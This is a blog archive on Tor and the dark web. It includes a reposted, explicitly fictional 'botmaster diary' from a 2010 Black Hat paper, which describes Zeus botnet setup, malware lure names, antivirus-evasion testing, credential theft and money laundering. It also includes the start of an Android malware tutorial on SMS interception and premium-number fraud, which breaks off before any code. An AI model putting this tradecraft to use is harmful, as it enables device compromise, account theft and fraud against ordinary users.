10/11/13

Tor Wacky Times and the NSA

gAtO rEaD – that Tor (The Deep Dark Web) is now all messed up by the NSA, FBI and LEO so all you bad guys using the Tor network better watch out, or should they???fed_links_01

Aug 5 the FBI snakes in Freedom Hosting and put a number of websites out of business in the Dark Web. They let the flames go out that they caught a bunch of Pedophile sites with that bust, but it does not seem so.

The Attack on the Dark Net Took Down a Lot More Than Child Porn - http://gawker.com/the-attack-on-the-dark-net-took-down-a-lot-more-than-ch-1081274609 – gAtO contribute to this article–

fed_usCitizenship_01Aug 19 – Millions of Tor Clients start to go up in numbers. What’s this all about, we get a bunch of Tor clients just hanging around doing nothing in Tor. Some say it’s a Bot-net or something like that. Then it growns 4, 5  million Tor users and the last week or so it starts to go down again. So what is all this about all these Tor Clients and the Tor- Botnet?fed_rent_a_hacker01

Oct 3– Silk Road get’s taken down, Oh the FBI had a copy of the Silk Road servers back in June just before the AUG 5 take down of FH by the FBI. So the Feds had Silk Road all this time and this is all they can do, can’t even get a few Bitcoin wallets- what a cluster fˆ%k—//fed_cc-paypal_01

Now you got NSA saying that Tor is cracked and the bad guys cannot use it. They claim that they can hack Tor anytime and anywhere with documents that a summer student left on how to hack the Tor network back in 2006. By the Way – most of these hacks do not work in Tor, maybe on a regular network but not on the Tor network.fed_hit_man_01

So now gAtO goes in search of Tor sites and a lot of sites went down by hook or crook —BUT someone has started to replace these Tor Hidden Websites in the Tor Network – But something is FuNnY – all these sites us the same web templates -

So now you can take a walk down memory lane and see all the older Tor-Websites have gone away and new ones have magicly re-appear.

fed_apple4bitcoin_01Now if this was the only place were this has happens OK sure, but at other Tor- Wiki Tor Link sites you will see the same thing – Commercial sites are all FuNnY and all the non-commercial Tor-websites are Tango Down.

So now Tor goes round and round but nobody knows what the heck is going on- In the Tor network – The Deep Dark Web run by Criminals or the FBI – you can answer these questions yourself by visiting the site –trust but Verify– ((not me))– gAtO oUt

fed_counterfiet_euro_50 fed_counterfiet_usd_01 fed_links_01 fed_mobile_steal_store_01 fed_uk_guns_01

 

 

 

 

 

 

 

 

 

 

 

 

01/10/13

Tor Users in South America

gAtO - was thinking about the different Tor users in Latin America while checking for a project and this made me wonder what is really going on. Let’s take a look at Brazil first:

All my charts will include from Jan-2012 to Jan 2013 -

Brazil shows from 170k users to 100k users this is normal for Brazil as one of the largest country in SA – But the problem I see right away is the Bridge Relays – these are the kinda secret OR that people use to hide if they think they are being monitored you can see that they have gone down Big-Time- why is this happening I have to ask myself. Is ti that people are becoming more confortable and do not fear the government or are the actual bridge-relays just going down.

Next We go travel Down to Chile:

and we find that they do not have any OR but they have from 1000 users toa high of 1800 users :

Some of the other things is I cannot find OR for quite a few countries Like SPAIN that is ODD and Argentina has over 8 sometimes 10 OR for a Tor users this just makes no sense I also checked for bridges OR but every where there use has gone down – I guess that they are becoming more confortable that Tor works and just go with normal automatic Tor selection.

Let go up and check out Mexico – this one took me by surprise – Only 1 OR – I will have to setup some more test with some new Tor Tools I am working on to get a better picture of what the heck is going donw with Latino Tor Users worldwide – - adios amigos- gATO oUt 

1_sa_ar_or 1_sa_ar_user 1-sa_br_users11_br_brazil1_sa_chile_br_usr 1_sa_chile_usr 1-sa_belize_usr 1-sa_columbia_usr11-sa_colunbia 1-sa_dr_usr 1-sa_ecuador_usr 1-sa_elSalvador_usr 1-sa_mx_bridge_or 1-sa_mx_tor-OR 1-sa_mx_usr 1-sa_panama_usr 1-sa_parguay_usr 1-sa_peru_usr 1-sa_pr_usr 1-sa_spain_usr11-sa_spain 1-sa_vebazuela_usr11-sa_venezula

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

10/25/12

The deep Dark Web -Book Release

gATO hApPy

AVAILABLE @ AMAZON - http://www.amazon.com/dp/B009VN40DU

AVAILABLE @SmashWords website  @http://www.smashwords.com/books/view/247146

I learned that I hate WORD: – but it’s the general format for publishing  - text boxes- get imbedded and you can’t format to EPUB or .mobi or anything – solution after going lOcO gAtO - was copy and paste into txt editor – save as RTF then copy paste back into a new WORD document and then reformat everything from scratch – and copy over the pictures – as you can tell I had fun-..-ugh mEoW F-F-F-F as much fun as a hairball but if it get’s the message out “FREEDOM OF SPEECH IN CYBERSPACE” then we done our job, anyway I hope you read it - Thank you Pierluigi a best friend a security gAtO ever had - gATO oUt

This Book covers the main aspects of the fabulous and dangerous world of -“The Deep Dark Web” . We are just two cyber specialists Pierluigi Paganini & Richard -gAtO- Amores, with one passion and two souls we wanted to explain the inner working of the deep dark web. We have had a long collaboration in this efforts to document our findings we made infiltrations into the dark places inaccessible to many to give a you the reader a clear vision on the major mystery of the dark hidden web that exist today in the Tor Onion network..

The Web, the Internet, mobile cell devices and social networking has become commonly used words that identify technological components of daily Internet user’s experience in the cyberspace. But how much do we really know about cyberspace? Very, very little, Google / Yahoo / Bing only show us 20% of the Internet the other 80% is hidden to the average user unless you know were to look.

The other 80% of the Internet is what this book is about the “Deep Dark Web”, three words with millions of interpretations, mysterious place on the web, the representation of the hell in the cyberspace but also the last opportunity to preserve freedom of expression from censorship. Authorities and corporation try to discourage the use of this untapped space because they don’t control it. We the people of the free world control this network of Tor -Onion Routers by volunteer around the world.

The Deep Dark Web seems to be full of crooks and cyber criminals, it is the hacker’s paradise, where there are no rule, no law, no identity in what is considered the reign of anonymity, but this is also the reason why many persecuted find refuge and have the opportunity to shout to the world their inconvenient truths.

The Deep Dark Web is a crowded space with no references but in reality it is a mine of information unimaginable, a labyrinth of knowledge in the book we will try to take you by the hand to avoid the traps and pitfalls hopefully illuminating your path in the dark.

Cybercrime, hacktivism, intelligence, cyber warfare are all pieces of this complex puzzle in which we will try to make order, don’t forget that the Deep Dark Web has unbelievable opportunity for business and governments, it represents the largest on-line market where it is possible to sell and acquire everything, and dear reader where there is $money$  you will find also banking, financial speculators and many other sharks.

Do you believe that making  money in Deep Web is just a criminal prerogative? Wrong, the authors show you how things works in the hidden economy and which are the future perspectives of is digital currency, the Bitcoin.

This manuscript proposes both faces of the subject, it illustrates the risks but also legitimate use of anonymizing networks such as TOR adopted by journalist to send file reports before governments agents censored his work .

Here are some question we may answers to:

How many person know about the cyber criminals and their ecosystem in the deep web? 

How many have provided information on the financial systems behind the “dirty affairs”? 

How the law enforcement and governments use Dark Web?

Let’s hold your breath and start the trip in the abyss of knowledge to find answers to the above questions. We hope that with this book you can learn something new about – The Deep Dark Web.

10/22/12

Diary of a Professional Botmaster

gAtO -found this and had to share with you. If you want to know how a botMaster is created check this out. A simple software engineer becomes a botMaster sounds like “surreal Walter White in Breaking Bad”. First you will noticed that this was written in 2010 and it’s been a model of the botMaster persona. This is a fictional tale now add the Tor onion network to hide the c&c and mobile Android /iApple devices but it comes so close to the real edge, have fun reading -gAtO oUt

Becoming the Six-Million-Dollar Man Blackhat USA 2010 Gunter Ollmann 

 Diary of a Professional Botmaster 

June 20, 2009 

I’ve decided to restart the diary. I used to keep one many years ago, but stopped when I moved down to London and started my MSc in Computing & Security at King’s College – much use that degree ever turned out to be!

I found out yesterday that me and most of the team are going to be made redundant at the end of the month. It appears that the company doesn’t need so many developers after they decided to sell off the Private Banking division to some German brokerage and they ditched those annoying trader guys up on the 18th floor a couple of months back.

Anyhow, I’d better start looking for a new job. The markets pretty tight at the moment. It seems that all the banks are laying off folks and the developers are the first to go. Not surprising really. I’ve been thinking about setting up my own business for a while though. Perhaps it’s time to bite the bullet and just do it. Take that redundancy cheque and invest it in myself?

June 22, 2009 

Was down at the pub for most of the afternoon with Bill & Ted. We were tossing around ideas of businesses I could start – in particular, businesses that could make me a millionaire in a year’s time. Granted, most of the ideas were completely off the wall and would be destined to fail or end in my bankruptcy within weeks of starting them (or would likely land me in prison within short order) but some of the grey areas look like they could be pretty exciting.

Ted was going on about botnets and how they’re not really illegal. Sounds like rubbish to me, but I’ll check it out anyway.

Last year when we had that worm go around the office and the Ops guys spent a couple of weeks chasing it down and cleaning up systems – that was pretty cool, and I can see how the authors of that worm could make quite a bit of money from it with a little banking knowledge. I don’t think they ever got caught either. Ted told me that James – the lardy guy over in second-level helpdesk – said that they were still having outbreaks of that very same worm and uncovering other infected computers almost every day (after an entire year). How cool is that!

June 25, 2009

I’ve been reading up on botnets. The Internet is full of great information about them. YouTube even has tutorials on how to create the malware, deliver the bot agents, manage the Command and Control (CnC) and turn the stolen data into real money.

I did some digging on these hacker forums too. They’re pretty cool. Most are well organized and there are bundles of tutorials, guides and discussion threads on all aspects of the botnet business. There’s even entire forums dedicated to matching buyers with sellers – Craigslist style! Becoming the Six-Million-Dollar Man Blackhat USA 2010 Gunter Ollmann 

June 26, 2009

Had a great session with Demitri over IRC today. He’s been running a handful of botnets over the last couple of years and seems to know what he’s talking about. Came across his advertisement on one of the boards and was offering a free 2-hour test-drive of his botnet CnC console – so I got to play with a couple hundred computers. Some of the functionality was grayed out, but I got a chance to DDoS the companies’ website – from the comfort of my desk ?

I spoke with a couple of the company Internet ops guys afterwards – being careful in what I said of course – to see if they noticed. Apparently they did. It didn’t bring down the site, but they were alerted from their IPS. Supposedly this is a common enough occurrence and happens most weeks. I guess I’m a little disappointed with that. I wonder how many bots I’d need to take down the webserver?

Dimitri said that he normally uses about 5,000 bots to take down big websites – but 200 is more than enough to wipe out corporate VPN appliances. Handy to know!

June 27, 2009

Sat down with Jim the lawyer this afternoon. I wanted to go over the details of setting up my own contracting business. Since I haven’t had much luck on the replacement job front looking for permanent roles, I figured I’d just go down the contracting route – since there are more opportunities going for temporary software engineering positions.

There’s not much to creating your own business. Jim helped me with all the forms – so I just need to mail them off tomorrow, and I’ll be on the way to creating my first business. He also explained some of the nuances to setting up a company in some other countries and the possibilities of “offshore accounts” and tax havens. I took plenty of notes. You never know when that’ll come in useful.

June 28, 2009 

Spent all day harvesting hacker boards for tools and playing with them on a couple of old laptops. This stuff really is easy.

I even came across this guy(?) on one of the chat forums (who can’t have been more than 14 years old) who was selling a botnet of 2,000 computers for $400. The funny part though was when the flame war stated about how overpriced that was. Apparently you can pick up 2,000 computers for as low as a $50 Walmart giftcard.

June 29, 2009

I woke up this morning with an epiphany (or was it just a delayed hangover?). I’m going to start my own botnet – but not just any botnet, I’m going to do it properly and make a business from it! I’ll still pursue any legit consulting roles that crop up – still got to eat and pay the bills – but it’ll make a convenient front while I’m building botnets.

Why the botnet business? Because it’s cool! Well, actually, it’s more than that. I don’t want to work forever in a dull office job and, from what I can tell, botnet building seems to be pretty profitable – and not many people get caught. And, if they do get caught, they basically only get a slap on the wrist. Becoming the Six-Million-Dollar Man Blackhat USA 2010 Gunter Ollmann 

Having read quite a few of the news articles about the folks that got caught, it looks to me that they got caught because they did something stupid and/or they clearly crossed the criminal line – and the police were forced to do something about them.

I’m pretty sure that I’m smarter than that. Didn’t any of these guys ever consider building a business plan first? Plan it all out – have a strategy and stick to it!

I’ve left the computer downloading a few tool collections I found on one of the Argentinean malware blog sites. 4Gb of tools, kits and exploits. Awesome! And it’s all free!!

June 30, 2009

Final pay date from the “old job”, and I’m now officially free of the company. Ended up with a little over £35k after taxes too – so that’ll tide me over the next few months as I pull together my new business(es).

Last night’s download worked out pretty good. There are hundreds of botnet kits in there – complete with CnC interfaces, exploit packs, phishing templates, malware creators and obfuscators. Supposedly there’s a high likelihood that many of them are backdoored, but who cares – it’s time to play! I’m going to try a couple of them out on the corporate laptop before I have to hand it back – preferably one with a good rootkit. I wonder if they’ll ever notice?

July 1, 2009

Woke up this morning having dreamed about what kind of botnet business I want to build. Also figured out a few “rules” that I want to work towards – maybe more of a “guiding principles” perspective really.

1. DON’T GET CAUGHT – which means I’m going to be damned careful in setting up everything and making sure that nothing can be traced back to me personally. Sure, there’ll be layers to the onion, but I’m not going to allow myself to be let down by poor tradecraft and bad habits. Those hackers in France and Spain got caught because they didn’t have enough layers of deniability and mixed the use of their personal systems and their botnet infrastructure.

2. DON’T DO CRIMINAL HARM – While I’m pretty far removed from planning on being a Robin Hood, I’m not going to get mixed in with the Mob or other organized crime. Similarly, I’m not going to get involved with any political or religious drivel. I also don’t want to cause any physical harm – as that’s a sure way of getting the interest of the police – and, besides, it’s not who I really am. The more legit I can make this business, the easier it’ll be to bow out after I’ve made my money.

3. RESILIENCE AND SCALABILITY ARE MY FRIENDS – Since this is going to be a business, based upon the lessons I learned from the Private Banking firm and all I’ve been reading over the last couple of weeks, it should be possible to build pretty big botnets really fast – if I plan it well.

Resilience will be even more important though. Getting back to the “don’t get caught” principle and the layers of deniability (and abstraction), if I plan for making the CnC and distribution systems robust, I’ll endeavor to split things over Becoming the Six-Million-Dollar Man Blackhat USA 2010 Gunter Ollmann 

several hosting providers and geographic regions.

Also spent some time on the hacker portals and responding to some of the threads. Some of the more interesting forums are currently closed to me because I haven’t developed a site reputation – which can be gained by posting 20, 50 and 100 messages. This’ll be pretty easy though. Lots of questions about coding problems which I can answer without too much thought.

July 3, 2009

I think I’ve managed to plan out a few more CnC infrastructure ideas. I found a few more tutorials online – and also some good message threads on domain registration tactics, Dynamic DNS operators and folks that’ll distribute malware for a few cents. It appears that a good rate at the moment is around $100 for 2,000 guaranteed installs. A little pricey if I was buying, but it sounds like good money if I was to become a seller ?

I also realized that I forgot a rather important principle for inclusion – my zero’th principle…

0. I WANT TO BE RICH – but, more to the point I want to retire rich, not be the richest bloke in jail.

Which all means that I need to do some more investigation on how to secure the money. I don’t want the money to be directly traceable to me – nor to the consulting company I’ve just created – but I’m going to need ways to pay for stuff and ways to accept payments. All deniable of course.

Made a few new connections on the hacker forums. Now that I’m posting to some threads I’m getting direct messages from some of the folks there. A couple of the guys that reached out were trying to pimp out their services – both of them malware dropper services. Someone else asked if I was with the FBI.

The USA perspective was interesting. I hadn’t realized that the guys on the forums can see/track my IP address and from there work out where I’m located. I’ll have to do some experimenting with anonymous proxies and TOR networks. I ran across a few video tutorials on the topic yesterday. That’ll be my homework for this evening – getting something setup and hiding my IP address forever more…

July 4, 2009 

Surprise in the snail mail – company papers just came back. I’m now the CEO of Thrull Networks! Cool company name huh! I wonder if anyone will ever figure it out – thought it was apt at the time. Maybe it’s a little too close to the mark. 5% on the dumbness scale I guess. Will have to be smarter in the future. I’m going to keep it though. Even saw that some related .com and .net domain names are available for registering.

Earlier this morning I went out and bought a couple of new laptops. Nothing special, just some small(ish) $800 laptops that I’m dedicating to my botnet business – and will never taint them with the Thrull Networks consulting business. Although I will be claiming them as tax deductable expenditures. Becoming the Six-Million-Dollar Man Blackhat USA 2010 Gunter Ollmann 

Also spent most of today coming up with the rules I’m going to work under for achieving principles (1) and (3)… and maybe a little of (0) too.

So, the new rules…

A) Separate systems for work/pleasure/personal and botnets. The two new laptops are JUST for the botnet business. I’ve already installed a full disk encryption scheme and come up with a 44 character password. I doubt that anyone’ll be breaking that mother anytime soon.

B) Never connect to the botnet CnC or do any botnet-related business from my home network. Given the general availability of free WiFi at Starbucks and McDonald, etc., I’ll use those. A couple of additional rules there though – don’t frequent them in a regular pattern (sounds like a Tom Clancy spy novel), and don’t use stores that have CCTV setups. I was tempted to use some of the unsecured WiFi networks in the neighborhood – but that may be a little too close for comfort. Besides, the coffee will be better than what I have at home.

C) Change the MAC on the laptops regularly. I’ve already downloaded and installed a cool piece of software that does precisely that. I’ve also installed a bundle of different Web browsers – but have deliberately not installed any plug-ins etc. I was reading recently a couple of online projects that showed how they could query your Web browser through JavaScript and the DOM to build a signature of the browser – and how “unique” that became once you started installing plug-ins and how regularly you kept them patched. So I’m planning on keeping the laptops as simple and “dumb” as possible.

D) Never connect directly to the botnet infrastructure. Lesson learned yesterday. TOR and anonymous proxies are now default on all my computers – especially the two new laptops!

E) While encryption is my friend. Asymmetric crypto is going to be my live-in lover. Thanks Bruce for the tips!

July 9, 2009

Been playing around all week with the DIY kits I downloaded a couple of weeks back. The Zeus kit is pretty impressive with its polymorphic malware generator. I was running its output past some of the free online antivirus scanning portals and noting which (if any) antivirus tools detected the samples. On average, only a couple of the AV tools detected anything – and if they did, it was only some kind of generic signature such as w32.suspicious etc.

I was originally using www.virustotal.com, but when I tried to find other AV portals that might have more AV products in them I stumbled over a couple of cool threads that explained why I shouldn’t use that site (and a few others) because they share the malware samples with the AV vendors. Therefore the AV vendors will have detection signatures for the malware out within a few days. That sucks – because I probably just wasted a few dozen cool pieces of Zeus malware. Luckily there were plenty of alternative AV testing portals being recommended and (yet more) tutorials on how to set up your own malware QA testing regimes. Becoming the Six-Million-Dollar Man Blackhat USA 2010 Gunter Ollmann 

I’ve settled on www.virtest.com now. They charge a few dollars for the privilege of testing the malware I submit, but they allow me to upload multiple malware samples simultaneously in bulk format. They also have some other services for checking out the malware delivery websites too – so you can check to see if the exploit packs used by the Zeus kit (and others) are correctly installed and whether the other AV components (e.g. HIPS) detect the infection. Their VIP account is $50 per month. I’ll have to figure out a good way to pay for the service. Something that can’t be traced back to me personally…

July 10, 2009 

I spent the entire morning down at the Starbucks down by the park using their “free” WiFi. Cost me about $26 in coffee for the 4 hours.

Anyway, I set up a handful of free webmail accounts. A couple of Gmail accounts, a couple of Hotmail accounts and a couple of Yahoo accounts. I entered in garbage “personal” information, but gave them all the same password – “Lucky4Me*Unlucky4U”. They’re disposable accounts for trialing out a few new concepts and learning what works.

Next, I created a couple of websites to host the Zeus CnC console pages. I had originally been worried about how I was going to have to pay for the web hosting – but a quick search for “free web hosting” revealed plenty of services – including portals that provide detailed reviews of all the providers. Woohoo.

It took me about an hour to create the sites on 0000free.com. It’s the first website I’ve ever built – and I had to learn some PHP while doing it all. On the job training if you like. The index page is just a copy/paste job from some car-parts website – and the Zeus CnC configuration and bot registration pages are off in a subfolder. They’re accessible if you know the URL, but they’re intentionally not linked to from anywhere. I don’t really want some search engine crawling the sites and flagging the Zeus CnC.

I’ll be spending some time later tonight generating some malware samples that’ll use the two new CnC URLs. That’ll be hard work – should take me all of 10 seconds ?

July 11, 2009 

A botnet is born. I’m a father!

So, this morning I headed off to the Starbucks over by the athletics center to play with my newly minted malware and the CnC services.

I originally set up a VMWare session on the laptop and infected it with the new malware bot agent and watched it reach out to the CnC server. Meanwhile I browsed to the website, logged in to the CnC console, and saw the test victim register itself – so I spent a good half hour testing out all the features of the bot agent. It’s pretty slick. Ugly, but slick. The toughest part of all this was setting up the TOR agent to provide the anonymous web access in reaching the CnC console.

To get the bot malware into play I decided to upload the samples to the Newsgroups – since they don’t require me to host the files directly and also provide anonymous Becoming the Six-Million-Dollar Man Blackhat USA 2010 Gunter Ollmann 

uploading. One file I named “Windows7KeygenCrack.exe” and the other “iTunesDRMRemover.exe”, and included some BS text about how good the tools are. They were both uploaded to a handful of different alt.binaries. groups using different email accounts and source IP addresses.

I hung around Starbuck for another hour, but didn’t see any victims appear on the Zeus console – so paid a visit to Bill & Ted and grabbed lunch with them in town. Ted’s already gotten a new job at some Scottish bank. Chose not to tell them about my botnet research. The ideas may have come from them originally, but I’m not about to share this secret.

Anyhow, I popped in to the McDonalds by the railway station at about 4pm and connected to the Internet to see how my “botnet” was coming along. Surprise, surprise, I had three new members to my botnet. How cool is that! I was well chuffed with that small success and subsequently spent an entire hour connecting to each computer and checking out what I could access on their systems. Just as I was about to pack things up and head off home a fourth computer joined my botnet.

I couldn’t stop smiling on my way home from McDonalds. I think I may have even said “I’ve just fathered my first botnet” somewhere on the walk up the hill. Haha.

Guess where I’ll be tomorrow morning…

July 12, 2009 

Got to Starbucks early this morning and was online with my baby botnet by at least 9:30am. It had swollen over night and the counter had reached 18 computers – but I could only contact 6 of them. The others must have been turned off or something.

For the next hour (and second cup of Java) I created a couple dozen new malware bot agents and configured them to point to the same two Zeus CnC servers I’d set up yesterday. I then went on to use the same Newsgroup tactics – but picking a few other juicy social engineering file names (and descriptions) – e.g. “AcrobatProfessionalKeygen.exe”, “RossettaStoneLanguagePackUnlocker.exe”, etc.

By the time I left the coffee shop the botnet had grown to 23 computers – mostly in the US and the Netherlands, but a couple from Australia and Taiwan.

Went home afterwards to do some more studying and recon, and found some good information on how to automatically pull back account and identity information from Zeus malware clients. There are a number of scripts that you could run automatically on each botnet computer to extract their webmail credentials, anything they’ve told their IE or Firefox web browsers to remember, etc.

I also found some plug-ins for the Zeus CnC console that help to manage the data that comes back from the keylogger and other info-stealer components – which I installed on the web servers later on my return trip to Starbucks – and left CnC commands for the botnet malware to automatically start collecting and uploading the identity information. Becoming the Six-Million-Dollar Man Blackhat USA 2010 Gunter Ollmann 

By 7:30pm my botnet had reached 200 members. It’s no longer a “family unit”; it’s a small village and I’m Pastor of the flock.

July 14, 2009

Had a couple of contract interviews yesterday, and hadn’t managed to check on how my baby was coming along for a couple of days. So, it was with a rather pleasant surprise I noted that the botnet had reached 3,320 computers.

Actually, I’m not so sure about the number and whether it’s a good number to rely upon. The number of computers “active” were about 450 – and I tested that I could control them OK. As for the rest, well, they were “offline” – but I did have files from all 3,000+ computers sitting on the CnC server – so I guess they were successfully compromised with my botnet agent.

I moved all the files off the two CnC servers and copied them to the laptop. When I got home I started doing some analysis.

Brief stats (for posterity)…

942 Facebook accounts

766 Twitter accounts

322 Gmail accounts

318 Hotmail accounts

193 Yahoo accounts

76 Paypal accounts

… and lots of sub-50 accounts – many for services/websites I’ve never heard of before. All told, about 5,500 different accounts.

BTW I’m not sure I like using Starbucks – I’m spending too much money on coffee there ?

July 15, 2009

The botnet’s now reached 4,000 computers.

There was an email from 0000free.com waiting for me from yesterday. Apparently I should be upgrading to a paid account because of all the traffic/hits the site has been receiving. Just as well I moved off all the identity information and files – I was almost over the file quota too!

July 16, 2009

4,300. What’s the population have to be before a village can be called a town?

Created another couple of dozen malware for release on the Newsgroups since the botnet growth appeared to be slowing down.

July 17, 2009 

I think I’m the Mayor of a small town now. I visited the Starbucks down by the strip mall this afternoon and logged in to the botnet. 11,435 computers!

At first I thought it may have been a mistake since the size jump was so large. Introducing a couple new malware downloads didn’t get that much of a leap last time. But I figured it out after about 20 minutes of probing and searching. It would seem that the new file “MichaelJacksonDeath-OfficialAutopsyReport.exe” was more successful. It also managed to make its way on to some Torrent server and plenty of people are downloading it.

New lessons learnt from yesterday’s efforts: Becoming the Six-Million-Dollar Man Blackhat USA 2010 Gunter Ollmann 

1) Tying social engineering to media and entertainment current events results yields more additions to a botnet.

2) Torrent networks can make the botnet malware reach more people faster.

July 18, 2009

Just as well I downloaded all those new files yesterday, because the botnet is dead. I’m no longer the Mayor.

This morning I popped on over at the Library for a bit of their WiFi access and tried to connect to my CnC servers. Nothing – well, more than nothing, the Zeus CnC pages had been deleted and my webserver account had been disabled. There were instructions to phone the helpdesk to discuss reactivation.

Waiting in the inbox of the webmail account I used to register the free websites was an email telling me that my site may have been hacked and was being used for malicious purposes.

A quick Google revealed that both CnC URL’s and configuration files were listed up on ZeusTracker.abuse.ch.

Bugger!

July 19, 2009 

All is not lost. I’ve still got all those identity/account detail files from all my botnet computers. The total – adding the first batch with the batch from the 17th – comes to a little shy of 19,000 unique sets of credentials. I can still access any (if not all) of those stolen accounts anytime in the future.

Better yet – there’s absolutely nothing that can be tracked back to me. Sure, the botnet is now out of my control (and computers are still being compromised with the malware which is still in circulation in the Newsgroups and Torrents), but I’m safe and have learnt a few new lessons.

That said though, it’s about time I started to focus on bringing in the money from the botnets. I’m not going to get that Porsche building botnets for botnets sake. I could easily enough find buyers for the stolen information – the hacker forums are overflowing with buyers and agents. That’s not a problem. The problem lies in converting “Internet money” into cash – and laundering those transactions sufficiently.

With that in mind, I spent all afternoon researching offshore banking and the creation of anonymous accounts. Disappointingly those infamous Swiss Numbered Accounts don’t exist anymore – at least not like they do in the movies.

I managed to narrow it down to three banking accounts and, as my finances grow, I’ll start to bring them on line. I’ve found agents that will allow me to set up Swiss banking accounts online. They require proof of address, but they provide a level of guarantee that personal information will not be supplied to anyone outside of Switzerland. The Cayman Island accounts are easier to set up – and don’t require an agent – but require a higher deposit. They’re a little too rich for my tastes at the moment – but I’ll probably add an account once I break the $100k per month revenue stream (if ever?). Becoming the Six-Million-Dollar Man Blackhat USA 2010 Gunter Ollmann 

No, the account I created online this evening was for a Panama Bearer Share Corporation account. As of an hour ago I’m now CEO of a second company – “Net Wizards LLC.”. I deposited $5,000 into the account. Not only does it provide an anonymous business front and full international banking facilities, but it comes with 4% interest and the credit cards issued against the account should be arriving in 10 days time.

July 20, 2009

I’m back in the botnet business!

I was keeping a couple of my hacker forum accounts live by responding to a few message threads and I stumbled across a couple of reputable botmasters that were in the process of selling off sections of their botnets. They were offering batches of 100 bots with dedicated CnC hosted servers for $200 each.

Most significantly though – there were alternatives to the $200 in Webmoney or PayPal funds – they’d accept hacked webmail accounts, Facebook accounts and Twitter accounts.

After a little back and forth, we agreed on the trade and exchange mode (had to use an agent that was pre-vetted on the forum – one of the administrators – who charges 10% for his time/effort). From X4cker I picked up 600 bots and two CnC servers (in the Ukraine no less) for 3,000 Gmail accounts and 1,000 Hotmail accounts. From Dankar007 I managed to procure 500 bots for the princely sum of 500 PayPal accounts. The site administrator/agent didn’t do too badly out of the deal either. I’m sure that he (or she?) now has his own copies of all those accounts.

After some quick verification and having tested the access to the two botnets, I created a new Zeus botnet agent and pushed it down to all 1,100 bots – and changed the admin credentials on the CnC servers.

Not only am I back in “business” with a brand new botnet, but I’ve still got all those account details from the previous botnet that I can continue trading/reselling to other operators.

– I just realized that this diary is now precisely one month old. In that month I lost my job, founded two companies, become a CEO, built a botnet, lost a botnet, established a reputation in the hacker communities, opened an international banking account, and just purchased my second botnet.

Time to start pulling together the business plan for constructing a profitable money-making botnet! The “march to a million” sounds like a great idea, but I’d prefer to aim for Steve Austin’s The Six Million Dollar Man. I’m pretty confident that I can reach that target over the next 11 months! What would mom say?

Original BlackHat PDF file -

http://media.blackhat.com/bh-us-10/whitepapers/Ollmann/BlackHat-USA-2010-Ollmann-6millionDollarMan-wp.pdf

ZeuS Tracker Statistics – https://zeustracker.abuse.ch/statistic.php

Note: This is a fictitious (and subtly macabre, but hopefully humorous) diary account loosely based upon real investigations of professional botnet operators and the criminal enterprises they created to monetize the data and systems under their control. It does not represent a single botnet operator, rather it represents a concatenation of notable business models, decisions and discussions from a spectrum of criminal operators. Names and places have been deliberately altered. No animals were harmed in the making of this diary.

 

08/29/12

sms bot 4 Android in the onion

Privacy On The Android

gAtO think —everything that follows is for android phones only. I hate phones todays devices are a little to much power. As I predicted back in January cell devices will become the linch pin of corporate security. Nothing should be thought of as 100% safe or guaranteed and/or legal in your area these are just things that you should consider of course getting an iPhone may be easier. —/ cyber criminals are using the Android cell device in new ways bypassing your phones security—/  you should always do your own research and be a cyber critical user.

[1.] if you haven’t done it already, flash your android and put Cyanogen Mod 7 on there. just rooting your phone isn’t good enough. you need to flash it and get all that bullshit and bloatware off your phone. Info on how to do this can be found at http://www.androidforums.com/

[2.] firewall your phone. Droidwall is a firewall based on iptables for linux. it will prevent data access to apps unless you specifically allow it. LBE Privacy Guard will limit access to specific functions for apps. for example, it will prevent apps that have no business requiring contact information or fine gps location from accessing said functions. LBE can also block apps from requesting IMEI info. both work very nicely with each other. LBE Privacy Guard does NOT prevent your carrier from accessing your location. it only prevents the apps you define from accessing the gps function, as well as almost any other function you choose. more information is available by searching the android market.

[3.] apply encryption and security to calls & texts. Redphone is an end-to-end encrypted VOIP app and TextSecure is an encrypted (you guessed it) app for texting. in order for these to work, the person you are trying to call or text must have the apps installed on their phone as well, so it’s not good for calling house phones or any other phones besides other androids, really. i believe apple blocked redphone from their app store so that’s just one more reason why apple sucks. both apps were written by moxie marlinspike and the guys over at whisper systems. there’s also another app by the guardian project for secure texting called Gibberbot that’s definitely worth checking out. more info is available in the android market or by visiting http://www.whispersys.com/ (or guardianproject.info for gibberbot)

[4. ] delete exif data and obfuscate pictures. ObscuraCam by the guardian project can do just that. you can import pictures into ObscuraCam or you can use this app to take pictures with. it can remove exif data and it can pixelate faces to prevent facial recognition. (for those who don’t already know, exif data is identifying metadata embedded in pictures such as gps location, timestamps, phone make/model, etc. exif data exists on all pictures taken with digital cameras, not just phones). more info can be found in the android market or at https://www.guardianproject.info

[5.] orbot is TOR for android and orweb is the accompanying browser. if you didn’t already know this, then you obviously don’t visit the TOR website enough. orbot works well with tethering and will allow you to surf anonymously even if you don’t have TOR on your computer. not sure how secure it is compared to regular TOR, and i certainly wouldn’t recommend doing anything too serious over your phone since your phone is basically a self imposed bug in your pocket, but if necessary, it’s better than the nothing. more info: the tor website or guardianproject.info

Intro to Android Malware

Most of the malware people here are only working with desktop exploits and web apps (and servers), which is a bit disheartening since Android malware seems to have way more potential for much less effort. Not only that, but infected phones can be turned directly into a profit by abusing premium phone numbers and premium sms numbers. No need to deal with banking or credit card security measures, or with fraud detection. Plus, infected phones make incredible proxies because they’re almost always online, and there are fewer tools to detect them (has anyone even heard of a GSM/CDMA NIDS?).
i think it’s safe to say that most malware coders has never written an Android application and working in Tor to boot is a different mindset. i will, however, go over the app system by stepping through a program that intercepts SMS, listens for commands, and responds.Android App Overview

in the Android OS and this applies to most cell devices -/ in writing malware for android you must understand there are four “forms” that an application can take:

Activity – Service – Receiver – Provider

  • Activities run in the foreground.
  • Services either run in the background or provide an interface for functionality between applications.
  • Receivers act on publicized information.
  • Providers offer an interface to data between applications.

Anything you package should be declared in the AndroidManifest.xml file within the <application> section.

One important thing to note is that all of these are treated equally in a packaged application. The fact that a Receiver doesn’t have to interact with a user doesn’t mean that it can’t be packaged alone. With that, it’s possible to run code effectively on install since there’s no need to wait for a user to run your app before you can do something useful. Your options for this are to either package a Service and wait for someone to want to use your code, package a Provider and wait for someone to request data, or package a Receiver and wait for someone to publicize information.

Sniffing SMS

The Receiver option is the only one that doesn’t rely on other applications, so let’s create a Receiver.

  • Create a new class, SmsReceiver and make it extend android.content.BroadcastReceiver. All receivers must be a subclass of BroadcastReceiver
  • Create the following method, which is the one called when the system has a new message for a Receiver:

